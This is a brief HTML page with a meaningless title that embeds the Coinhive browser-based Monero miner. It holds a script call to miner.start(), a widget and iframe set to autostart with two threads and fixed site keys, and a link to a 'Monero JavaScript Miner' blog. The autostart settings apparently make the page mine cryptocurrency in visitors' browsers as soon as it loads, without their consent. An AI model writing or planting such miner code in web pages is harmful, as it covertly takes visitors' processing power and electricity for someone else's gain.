<html>
  <head>
    <title>sssdasdasdsafgshsrh</title>
  </head>
 <body>
    <center>
    <script async="" src="https://coinhive.com/lib/miner.min.js">miner.start();</script>
    <div class="coinhive-miner" data-action="#00ff00" data-autostart="true" data-background="#000000" data-graph="#555555" data-key="HVpsyOZ7teBTr5dZeHnVN2LkeTURADe7" data-start="Start Now!" data-text="#eeeeee" data-threads="2" data-throttle="0.3" data-whitelabel="false" style="height: 95px; 
    width: 530px;"><iframe src="https://coinhive.com/media/miner.html?key=qBKSlGW6vDnrFWPK85ruoP6yRYpskjhA&amp;user=&amp;whitelabel=0&amp;autostart=1&amp;throttle=0.3&amp;threads=2&amp;background=000000&amp;text=eeeeee&amp;action=00ff00&amp;ref=&amp;graph=555555&amp;start=Start%20Now!" style="width: 100%; height: 100%; border: none;"></iframe></div>
    <a href="https://bot-coinhive.blogspot.com/">Monero JavaScript Miner</a>
    </center>
    </body>
</html>
